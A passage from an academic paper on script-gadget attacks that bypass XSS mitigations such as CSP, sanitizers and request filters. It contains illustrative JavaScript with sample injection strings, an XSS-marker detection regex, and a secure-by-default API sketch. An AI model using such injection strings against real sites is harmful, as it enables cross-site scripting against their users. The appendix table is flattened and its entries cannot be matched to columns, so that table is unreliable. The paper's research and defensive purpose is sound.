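  if (TEXT_SINKS.has(flow.sink)) {
    // Categories 1 and 2: content of a script tag, or of a tag whose
    // name is itself DOM-controlled (tainted).
    return flow.tagName === "script" || flow.tagNameTainted === true;
  }
  // Category 3: the src attribute of a script element.
  if (flow.sink === "script.src") return true;
  // Category 4: an API known to create and append script elements.
  return SCRIPT_CREATING_APIS.has(flow.sink);
}

const sampleFlows = [
  { sink: "textContent", tagName: "script" },
  { sink: "innerHTML", tagName: "div" },
  { sink: "innerHTML", tagName: "unknown", tagNameTainted: true },
  { sink: "script.src" },
  { sink: "jQuery.html" },
  { sink: "eval" },
];

console.log(sampleFlows.map(isStrictDynamicRelevant));
// [ true, false, true, true, true, false ]
```

Note that a plain innerHTML assignment on a div is not counted here, since scripts inserted that way are not executed by the browser.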
Content Security Policy - Summary. Given the numbers and
examples provided above, we believe that
unsafe-eval
and
strict-dynamic
considerably weaken a CSP policy. Great care
should be taken when using these source expressions.
19
https://developers.facebook.com/docs/ads-for-websites/pixel-events/v2.9
HTML Sanitizers: Sanitizers aim at removing potentially malicious
content. Most sanitizers do this by defining a known-good
list of tags and attributes and removing anything else from a provided
string. This list varies from sanitizer to sanitizer. The Closure
sanitizer, for example, removes data- attributes, while DOMPurify
allows them in its default configuration. Furthermore, all sanitizers
we looked at allow id and class attributes. Hence, we investigated
whether this behavior is secure. In our data set 78.30% of all second-level
domains had at least one data flow from an HTML attribute
into a security-sensitive sink, whereas 59.51% of the sites exhibited
such flows from data- attributes. Furthermore, 15.67% executed
data from id attributes and 10% from class attributes. Based on
these numbers, we recommend revisiting the sanitization approach,
at least with respect to blocking data- attributes.
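The effect of the two default behaviors can be seen in a toy attribute allow-list. The configurations below only mirror the defaults described in the text; they are not the real DOMPurify or Closure rule sets, and filterAttributes and both configuration names are hypothetical.

```javascript
// Toy attribute allow-list in the spirit of an HTML sanitizer.
const CONFIGS = {
  allowsDataAttributes: { names: new Set(["id", "class"]), dataAttributes: true },
  stripsDataAttributes: { names: new Set(["id", "class"]), dataAttributes: false },
};

function filterAttributes(attributes, config) {
  const kept = {};
  for (const [name, value] of Object.entries(attributes)) {
    const isData = name.startsWith("data-");
    if (config.names.has(name) || (isData && config.dataAttributes)) {
      kept[name] = value;
    }
  }
  return kept;
}

const injected = {
  id: "button",
  "data-text": "<svg onload=verify()>",
  onclick: "verify()",
};

// Event handler removed, data- attribute (and thus the gadget input) kept.
console.log(filterAttributes(injected, CONFIGS.allowsDataAttributes));
// Event handler and data- attribute removed, id kept.
console.log(filterAttributes(injected, CONFIGS.stripsDataAttributes));
```

Even the stricter configuration keeps id and class, so gadgets that read from those attributes remain reachable.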
5.4.4 Gadget Results. Based on the identified data flows, we generated
1,762,823 gadget-based exploit candidates, based on which
we validated 285,894 gadgets on 906 (19.88%) of all second-level
domains.
6 SUMMARY & DISCUSSION
Our study has demonstrated that data flows from the DOM into
security-sensitive functions are very frequent in modern applications
and frameworks. In fact, 81.85% of all second-level domains
exhibited at least one relevant data flow. Furthermore, we have
shown that we can detect these flows and generate exploits that
are capable of bypassing all modern XSS mitigations. In a fully
automated fashion, we detected and verified gadgets on 19.88%
of all second-level domains. However, due to our methodology,
we believe that this is just a lower bound for the real extent of
this problem. By applying deeper crawling, authentication, user
interaction and a less conservative testing approach, the numbers
would doubtlessly increase considerably. We specifically removed
or changed all exploits that would result in an immediate execution
at the initial injection.
Given these results, we believe that XSS mitigations in their
current form are not well aligned with modern applications,
frameworks and vulnerabilities. In general, we see three different ways
to address the issue of script gadgets:
6.1 Fix the Mitigation Techniques
Making mitigation techniques gadget-aware in general is hard. Today
there are so many expression languages, frameworks, libraries
and instances of user-land code that it will be very difficult to
address all of the different types of gadgets. For example, request
filtering mitigations (Section 4.2) will have a hard time detecting all
the various forms that script gadgets can take, especially when the
gadget chain makes use of string transformation functions. However,
we believe that a few of the vectors can be addressed by specific
mitigations. HTML sanitizers, for example, could start to filter
data-, id or class attributes.
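The difficulty that string transformations pose for request filtering can be sketched as follows. Both functions are hypothetical stand-ins: naiveRequestFilter is a deliberately simple pattern check, not the rule set of any real filter, and decodeEntities represents a transformation step that some gadget might apply to a value it reads from the DOM.

```javascript
// Hypothetical request filter: accepts input unless it contains obvious
// XSS markers (script tags, inline event handlers, javascript: URLs).
function naiveRequestFilter(input) {
  return !/<script|\bon\w+\s*=|javascript:/i.test(input);
}

// Hypothetical gadget step: legitimate application code that decodes HTML
// entities in a value before handing it to a later processing stage.
function decodeEntities(value) {
  return value
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, "&"); // decoded last to avoid double decoding
}

// Benign-looking value as it might appear in a request parameter.
const injectedValue = "&lt;script&gt;payload()&lt;/script&gt;";

console.log(naiveRequestFilter(injectedValue));                 // true: passes the filter
console.log(naiveRequestFilter(decodeEntities(injectedValue))); // false: the transformed value would have been blocked
```

The filter only ever sees the first form. The dangerous form exists only after the application's own code has run, so a filter would have to anticipate every transformation that any gadget might apply.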
6.2 Fix the Applications
Another approach to address the identified problems is to try to
fix the applications. Popular libraries and frameworks, for example,
could aim at removing gadgets in order to safeguard their users.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
Given the extent of the problem, however, we will likely not be able
to address this problem at scale.
As some gadgets and gadget chains are part of the feature set of
a framework, it is unlikely that developers of such frameworks are
willing to remove or restrict these features to prevent XSS mitigation
bypasses. Furthermore, we found a number of unintentional
gadgets: code paths triggered through gadgets that were
not intended by their developers. These unintended code paths are
hard to find, sometimes even harder than a simple XSS vulnerability.
As a result, we believe that fixing XSS mitigations and script
gadgets might be as hard and time consuming as fixing the XSS
problem itself.
6.3 Shift from Mitigation to Isolation and
Prevention techniques
Due to the results of our study, we believe that the focus of Web
Security engineers should shift from mitigation techniques towards
isolation and prevention techniques. Sandboxed Iframes [13],
Suborigins [36] or Isolated Scripts [22] are promising proposals for
Isolation techniques. Furthermore, the Web needs to focus on XSS
prevention techniques: The Web platform is inherently insecure.
A novice programmer without much security knowledge is hardly
able to create a secure Web application. The Web platform should
let a developer easily create a secure app by providing
secure-by-default APIs. Language-based security concepts, for example,
could be added to the Web platform, so that it is impossible to introduce
security vulnerabilities without malicious intent.
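As an illustration of what a secure-by-default API could look like, the following minimal sketch wraps an HTML sink so that it only accepts values produced by an escaping constructor. The names SafeHtml and setHtml are hypothetical and do not refer to an existing Web platform API; the sketch only shows the general idea of enforcing safety through types rather than through after-the-fact mitigation.

```javascript
// Module-private token: only code in this module can construct SafeHtml.
const CONSTRUCTION_TOKEN = Symbol("SafeHtml construction token");

class SafeHtml {
  constructor(token, html) {
    if (token !== CONSTRUCTION_TOKEN) {
      throw new TypeError("Use SafeHtml.escape() to create SafeHtml values");
    }
    this.html = html;
    Object.freeze(this); // the wrapped string cannot be swapped out later
  }

  // Turns arbitrary text into markup that renders as plain text.
  static escape(text) {
    const escaped = String(text)
      .replace(/&/g, "&amp;")
      .replace(/</g, "&lt;")
      .replace(/>/g, "&gt;")
      .replace(/"/g, "&quot;")
      .replace(/'/g, "&#39;");
    return new SafeHtml(CONSTRUCTION_TOKEN, escaped);
  }
}

// Hypothetical sink wrapper: refuses raw strings, so unescaped input cannot
// reach innerHTML by accident. `target` is any object with an innerHTML
// property, for example a DOM element.
function setHtml(target, value) {
  if (!(value instanceof SafeHtml)) {
    throw new TypeError("setHtml() requires a SafeHtml value");
  }
  target.innerHTML = value.html;
}
```

Because escaped text cannot create elements or attributes, input passed through such an API cannot introduce markup that matches a gadget's selector. The approach prevents the initial injection and does not attempt to detect gadgets.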
7 RELATED WORK
Client-side XSS: While the initial content injection can stem from
any class of XSS, gadget-based attacks are
rooted in insecure client-side data flows caused by JavaScript. Thus,
the closest related class of vulnerabilities is client-side XSS, also
known as DOM-based XSS. The first public documentation of this
vulnerability class was done by Amit Klein in 2005 [16]. In 2013,
Lekies et al. [17] conducted a large-scale study that demonstrated
the prevalence of this XSS type, showing that approximately 10%
of the examined web sites exposed at least one client-side XSS
problem. To address this problem, Stock et al. [32] proposed a taint
tracking-based protection mechanism to stop insecure data flows
within the web browser. While taint tracking could potentially
detect or stop gadget-based attacks, their approach only covers
client-side data flows. Most of our exploits, however, have hybrid
data flows that span across the client and the server. Hence, in its
current version Stock et al.’s approach cannot stop our attacks. More
recently, Parameshwaran et al. [26] advanced this defense via server-side
instrumentation of the JavaScript code, thus eliminating the need
for browser modifications. It is unclear to which degree these
taint-based techniques can be adapted to address script gadget attacks,
as the initial payload does not come from an untrusted source and
thus is not easily distinguishable from the legitimate targets of
the gadget code.
The potential security problems of insecure JavaScript transforming
DOM content were initially documented by Heiderich et al.
in two distinct variations. In the first, they showed how JavaScript
frameworks like AngularJS create insecure injection vulnerabilities
which are out-of-scope for classic server-side XSS sanitization
techniques, due to custom client-side markup conventions [10].
Furthermore, they uncovered how specific, non-standard browser
behavior potentially transformed initially secure DOM content into
executable code, if read and rewritten via JavaScript [12].
Athanasopoulos et al. [2] described return-to-JavaScript, a similar attack
scenario circumventing mitigations based on script whitelists. In
their attack, the attacker executes already whitelisted scripts in an
unwanted fashion. The basic assumption of their attack is that an
XSS exists in the application and the attacker is only able to execute
already whitelisted scripts. Under these assumptions the attacker
could try to repurpose whitelisted scripts. For example, if there is
a button with a whitelisted event handler that logs out the user,
the attacker could reuse the whitelisted event handler and attach
it to an onload event via the XSS vulnerability. In this way users
would be logged out immediately once they visit the application.
While the mitigation prevents general exploitation, the attacker
could still harm the user experience considerably by abusing the
existing scripts.
Circumventing XSS mitigations: The topic of undermining the
protective capabilities of XSS mitigations has been explored
previously as well. Zalewski [37] outlined potential future directions
for combating mitigations in his influential essay "Postcards from
the post-XSS world", touching on many emerging techniques, such as
content infiltration, whitelist abuse, or potential possibilities for
Web code reuse attacks.
On the topic of browser-based XSS mitigations, Nava and Lindsay [23]
and Bates et al. [3] exposed inherent weaknesses in XSS
mitigation approaches that rely on regular-expression-based
detection mechanisms. These results directly motivated the design
of the XSSAuditor [3]. In turn, Stock et al. [32] demonstrated the
weakness of all string-based XSS filters in non-trivial vulnerability
scenarios, such as partial or double injections.
In addition to research on client-side XSS filters, Content Security
Policy was the subject of several research endeavors. For one, in
concurrent work Weichselbaum et al. [35] and Calzavara et al. [4]
examined the quality and effectiveness of currently deployed CSP
policies with sobering results. In addition, Weichselbaum et al. [35]
demonstrated how whitelist-based policies can be easily evaded
using overly permissive whitelisted script providers. In
complementary work, Chen et al. [6] and Van Acker et al. [1] presented
various techniques to evade CSP’s information flow restrictions.
Furthermore, Pan et al. [25] investigated how to automatically
generate secure CSP policies (without the unsafe-inline or unsafe-eval
keywords). While these policies could resist simple gadgets, such
strong policies are still vulnerable to expression-based gadgets as
outlined in Section 4.4. Finally, Heiderich et al. [11] demonstrated
how injected HTML and CSS code alone is sufficient to conduct a
wide range of attacks, even when a comprehensive CSP for script
execution prevention is in place.
8 CONCLUSION
In this paper, we comprehensively explored code-reuse attacks
in Web pages using script gadgets. Script gadgets come in many
variations and, as our empirical study uncovered, are omnipresent
in modern Web code.
As we have demonstrated, the current generation of XSS mitigations
is unable to handle XSS attacks that leverage script gadgets
to execute their payloads. And, unfortunately, there is no linear
upgrade path to adapt the current mitigation approaches to robustly
handle the uncovered vulnerability pattern. While specific mitigation
techniques can be modified to handle selected gadget types,
the high variance of script gadget form and functionality, due to
the vastly growing amount of custom client-side code and the
constant flow of new client-side frameworks, prevents a comprehensive
adaptation to accommodate the problem.
This leads to a conundrum for the future of client-side Web
security: The last 15 years of difficulty in addressing XSS have shown
that XSS apparently cannot be thoroughly addressed in practice
through secure coding practices alone. And the subject of this paper,
especially in combination with complementary results [9, 32],
suggests that the current approaches in XSS mitigation are insufficient
to compensate for the deficits of code-based XSS prevention.
The question then arises: how do we handle XSS on the road
ahead? As discussed above, sophisticated isolation techniques could
offer a third way of dealing with the potential consequences of
attacker-controlled JavaScript. Alternatively, safe code
abstractions [15] and secure-by-default browser APIs [20] might also be an
option to overcome today’s inherent problems of ad-hoc, insecure
Web content generation.
However, regardless of which paradigm the next generation of
XSS countermeasures will be built upon, it is essential that they
are capable of handling the unexpected client-side execution
and data flows which may be caused by legitimate script gadgets.
REFERENCES
[1] Acker, S. V., Hausknecht, D., and Sabelfeld, A. Data Exfiltration in the Face
of CSP. In AsiaCCS (2016).
[2] Athanasopoulos, E., Pappas, V., Krithinakis, A., Ligouras, S., Markatos,
E. P., and Karagiannis, T. xjs: practical xss prevention for web application
development. In Proceedings of the 2010 USENIX conference on Web application
development (2010), USENIX Association, pp. 13–13.
[3] Bates, D., Barth, A., and Jackson, C. Regular expressions considered harmful
in client-side XSS filters. In WWW ’10: Proceedings of the 19th international
conference on World wide web (New York, NY, USA, 2010), ACM, pp. 91–100.
[4] Calzavara, S., Rabitti, A., and Bugliesi, M. Content security problems?:
Evaluating the effectiveness of content security policy in the wild. In Proceedings
of the 2016 ACM SIGSAC Conference on Computer and Communications Security
(New York, NY, USA, 2016), CCS ’16, ACM, pp. 1365–1375.
[5] CERT/CC. CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in
Client Web Requests. [online], http://www.cert.org/advisories/CA-2000-02.html
(01/30/06), February 2000.
[6] Chen, E. Y., Gorbaty, S., Singhal, A., and Jackson, C. Self-exfiltration: The
dangers of browser-enforced information flow control. In Proceedings of the
Workshop of Web (2012), vol. 2, Citeseer.
[7] Gundy, M. V., and Chen, H. Noncespaces: Using Randomization to Enforce
Information Flow Tracking and Thwart Cross-site Scripting Attacks. In 16th
Annual Network and Distributed System Security Symposium (NDSS 2009) (2009).
[8] Heiderich, M. Towards Elimination of XSS Attacks with a Trusted and Capability
Controlled DOM. PhD thesis, Ruhr-University Bochum, 2012.
[9] Heiderich, M. Jsmvcomfg - to sternly look at javascript mvc and templating
frameworks. [online],
https://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating-frameworks,
2013.
[10] Heiderich, M. Mustache security wiki. [online],
https://github.com/cure53/mustache-security, 2014.
[11] Heiderich, M., Niemietz, M., Schuster, F., Holz, T., and Schwenk, J. Scriptless
attacks: stealing the pie without touching the sill. In Proceedings of the 2012 ACM
conference on Computer and communications security (2012), ACM, pp. 760–771.
[12] Heiderich, M., Schwenk, J., Frosch, T., Magazinius, J., and Yang, E. Z. mxss
attacks: Attacking well-secured web-applications by using innerhtml mutations.
In Proceedings of the 2013 ACM SIGSAC conference on Computer & communications
security (2013), ACM, pp. 777–788.
[13] Hickson, I. The iframe element, November 2013.
[14] Jim, T., Swamy, N., and Hicks, M. Defeating script injection attacks with
browser-enforced embedded policies. In Proceedings of the 16th international
conference on World Wide Web (2007), ACM, pp. 601–610.
[15] Kern, C. Securing the tangled web. Communications of the ACM 57, 9 (2014),
38–47.
[16] Klein, A. Dom based cross site scripting or xss of the third kind. Web Application
Security Consortium, Articles 4 (2005), 365–372.
[17] Lekies, S., Stock, B., and Johns, M. 25 Million Flows Later - Large-scale
Detection of DOM-based XSS. In Proceedings of the 20th ACM Conference on
Computer and Communication Security (CCS ’13) (2013).
[18] Louw, M. T., and Venkatakrishnan, V. BluePrint: Robust Prevention of
Cross-site Scripting Attacks for Existing Browsers. In IEEE Symposium on Security
and Privacy (Oakland’09) (May 2009).
[19] Maone, G. Noscript, 2009.
[20] MSDN. toStaticHTML method. [API],
https://msdn.microsoft.com/library/Cc848922.
[21] Nadji, Y., Saxena, P., and Song, D. Document Structure Integrity: A Robust
Basis for Cross-site Scripting Defense. In Network & Distributed System Security
Symposium (NDSS 2009) (2009).
[22] Nava, E. A. V. Fighting XSS with Isolated Scripts. [online],
http://sirdarckcat.blogspot.de/2017/01/fighting-xss-with-isolated-scripts.html,
January 2017.
[23] Nava, E. V., and Lindsay, D. Our favorite XSS filters/IDS and how to attack
them. Presentation at the BlackHat US conference, 2009.
[24] Oda, T., Wurster, G., van Oorschot, P. C., and Somayaji, A. Soma: Mutual
approval for included content in web pages. In Proceedings of the 15th ACM
conference on Computer and communications security (2008), ACM, pp. 89–98.
[25] Pan, X., Cao, Y., Liu, S., Zhou, Y., Chen, Y., and Zhou, T. Cspautogen: Black-box
enforcement of content security policy upon real-world websites. In Proceedings
of the 2016 ACM SIGSAC Conference on Computer and Communications Security
(New York, NY, USA, 2016), CCS ’16, ACM, pp. 653–665.
[26] Parameshwaran, I., Budianto, E., Shinde, S., Dang, H., Sadhu, A., and Saxena,
P. Auto-patching dom-based xss at scale. In Proceedings of the 2015 10th Joint
Meeting on Foundations of Software Engineering (New York, NY, USA, 2015), ACM,
pp. 272–283.
[27] Roemer, R., Buchanan, E., Shacham, H., and Savage, S. Return-oriented
programming: Systems, languages, and applications. ACM Trans. Info. & System
Security 15, 1 (Mar. 2012).
[28] Ross, D. Ie 8 xss filter architecture/implementation. Blog:
http://blogs.technet.com/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
(2008).
[29] Ross, D. Happy 10th birthday cross-site scripting! [online],
https://blogs.msdn.microsoft.com/dross/2009/12/15/happy-10th-birthday-cross-site-scripting/,
2009.
[30] Stamm, S., Sterne, B., and Markham, G. Reining in the web with content
security policy. In Proceedings of the 19th international conference on World wide
web (2010), ACM, pp. 921–930.
[31] Stamm, S., Sterne, B., and Markham, G. Reining in the web with content
security policy. In Proceedings of the 19th international conference on World wide
web (New York, NY, USA, 2010), WWW ’10, ACM, pp. 921–930.
[32] Stock, B., Lekies, S., Mueller, T., Spiegel, P., and Johns, M. Precise Client-side
Protection against DOM-based Cross-Site Scripting. In 23rd USENIX Security
Symposium (USENIX Security ’14) (2014).
[33] Tantek Celik, Daniel Glazman, I. H. P. L. J. W. Selectors level 4. W3C Editor’s
Draft (2017).
[34] W3C. Content Security Policy Level 3. W3C Editor’s Draft, 10 May
2017, https://w3c.github.io/webappsec-csp/, May 2017.
[35] Weichselbaum, L., Spagnuolo, M., Lekies, S., and Janc, A. Csp is dead, long live
csp! on the insecurity of whitelists and the future of content security policy. In
Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications
Security (2016), ACM, pp. 1376–1387.
[36] Weinberger, J., Akhawe, D., and Eisinger, J. Suborigins. W3C Editor’s Draft,
18 May 2017, https://w3c.github.io/webappsec-suborigins/, May 2017.
[37] Zalewski, M. Postcards from the post-xss world. Online at
http://lcamtuf.coredump.cx/postxss (2011).
A XSS MITIGATION BYPASSES VIA SCRIPT GADGETS IN JS FRAMEWORKS
Columns: Framework / Library | CSP whitelists | CSP nonces | CSP unsafe-eval |
CSP strict-dynamic | Chrome XSS Auditor | EDGE XSS filter |
NoScript XSS Filter 5.0.2 | DOMPurify 0.8.7 |
Google Closure HTML sanitizer (2017-05-01) | ModSecurity OWASP CRS 3.0.0

Frameworks and recorded cell entries:
Vue.js 2.3.0
Aurelia (2017-03-21)
AngularJS 1.6.1
Polymer 1.7.1: - (<template), - (<template)
Underscore 1.8.3 / backbone: -
Knockout 3.4.1: - (data- or comments)
jQuery Mobile 1.4.5: -, -
Ember.js 2.10.2: -, -
React: -
Closure: - (<a.*)
Ractive 0.8.1: - ({{}} uses eval), - (<script), - (script node), - (script), - (script), - (script)
Dojo 1.12.2: - (data-)
Requirejs 2.3.2: - (<script)
jQuery 3.1.1: -, -, - (<script)
jQuery UI 1.12.1: -, -
Bootstrap 3.3.7: - (HTML in HTML attr)